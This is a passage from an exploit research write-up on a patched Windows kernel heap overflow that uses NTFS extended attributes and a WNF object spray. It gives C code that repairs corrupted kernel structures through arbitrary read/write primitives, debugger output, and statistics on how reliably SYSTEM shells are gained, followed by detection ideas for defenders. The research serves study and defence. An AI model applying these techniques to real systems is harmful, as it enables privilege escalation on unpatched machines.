15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT

As you can see there is a member TemporaryNamesListHead which is a linked list of the addresses of the TemporaryNamesListHead within the _WNF_NAME_INSTANCE.

Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.

We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).

An example of this is:

/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{

    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    LPVOID first = read64((char*)wnf_process_context_ptr + 0x40);
    LPVOID ptr; 

    for (ptr = read64(read64((char*)wnf_process_context_ptr + 0x40)); ; ptr = read64(ptr))
    {
        if (ptr == first) return;

        // +0x088 TemporaryNameListEntry : _LIST_ENTRY
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}

NTOSKRNL Base Address

Whilst this isn’t actually needed by the exploit, I had the need to obtain NTOSKRNL base address to speed up some examinations and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, then the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into the wait state, we can then walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.

The following output shows the thread whilst in the wait state:

0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14

Exploit Testing and Statistics

As there are some elements of instability and non-deterministic elements of this exploit, then an exploit testing framework was developed to determine the effectiveness across multiple runs and on multiple different supported platforms and by varying the exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with potentially other third party drivers etc installed and a more noisy kernel pool, it gives some indication of this approach is feasible and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

  • Spray size
  • Post-exploitation choices

All these are measured over 100 iterations of the exploit (over 5 runs) for a timeout duration of 15 seconds (i.e. a BSOD did not occur within 15 seconds of an execution of the exploit).

SYSTEM shells – Number of times a SYSTEM shell was launched.

Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.

Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.

Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the max number of overflow attempts. 32 was chosen a semi-arbitrary value based on empirical testing and the blocks in the BlockBitmap for the LFH being scanned by groups of 32 blocks.

BSODs on exec – Number of times the exploit BSOD the box on execution.

Unmapped Read – Number of times the relative read reaches unmapped memory (ExpWnfReadStateData) – included in the BSOD on exec count above.

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 85 82 76 75 75 78
Total LFH writes 708 726 707 678 624 688
Avg LFH writes 8 8 9 9 8 8
Failed after 32 1 3 2 1 1 2
BSODs on exec 14 15 22 24 24 20
Unmapped Read 4 5 8 6 10 7

Spray size 6000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 80 78 84 79 81
Total LFH writes 674 643 696 762 706 696
Avg LFH writes 8 8 9 9 8 8
Failed after 32 2 4 3 3 4 3
BSODs on exec 14 16 19 13 17 16
Unmapped Read 2 4 4 5 4 4

Spray size 10000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 85 87 85 86 85
Total LFH writes 805 714 761 688 694 732
Avg LFG writes 9 8 8 8 8 8
Failed after 32 3 5 3 3 3 3
BSODs on exec 13 10 10 12 11 11
Unmapped Read 1 0 1 1 0 1

Spray size 20000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 89 90 94 90 90 91
Total LFH writes 624 763 657 762 650 691
Avg LFG writes 7 8 7 8 7 7
Failed after 32 3 2 1 2 2 2
BSODs on exec 8 8 5 8 8 7
Unmapped Read 0 0 0 0 1 0

From this was can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read (due to the page not being mapped) and thus reducing the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post exploitation method used (token stealing vs modifying the existing token). The reason for this is that performing the token stealing method there are more kernel reads/writes and a longer time duration between reverting PreviousMode.

20000 spray size

With all the _SEP_TOKEN_PRIVILEGES enabled:

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
PRIV shells 94 92 93 92 89 92
Total LFH writes 939 825 825 788 724 820
Avg LFG writes 9 8 8 8 8 8
Failed after 32 2 2 1 2 0 1
BSODs on exec 4 6 6 6 11 6
Unmapped Read 0 1 1 2 2 1

Therefore, there is only negligible difference these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well firstly there is a patch out for this vulnerability since the 8th of June 2021. If your reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on 🙂

However, there are some engineering insights which can be gained from this and in general detecting memory corruption exploits within the wild. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post exploitation technique detection (token stealing etc) which have been covered in many online articles. As I never had access to the in the wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should allow security researchers a greater understanding in this area.

The main artifacts from this exploit are:

  • NTFS Extended Attributes being created and queried.
  • WNF objects being created (as part of the spray)
  • Failed exploit attempts leading to BSODs

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace:

As this vulnerability can be exploited a low integrity (and thus from a sandbox), then the detection mechanisms would vary based on if an attacker had local code execution or chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser render process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome while loading a new tab and web page did not trigger either of the events too. I didn’t explore too deeply if there were any render operations which could trigger this non-maliciously but provides a place where defenders can explore further.

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.

Crash Dump Telemetry

Crash Dumps are a very good way to detect unreliable exploitation techniques or if an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. This was found by looking for shellcode, however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes too.

In the case of this specific vulnerability when being exploited with WNF, there is a slim chance (approx. <5%) that the following BSOD can occur which could act a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution. Once kernel code execution has been gained or SYSTEM, they may just disable the telemetry or sanitise it afterwards – especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios when this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.

At this point we now have an exploit which is much more succesful and less likely to cause instability on the target system than a simple POC. However, we can only get about 90%~ success rate due to the techniques used. This seems to be about the limit with this approach and without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and detection of memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.

❌
❌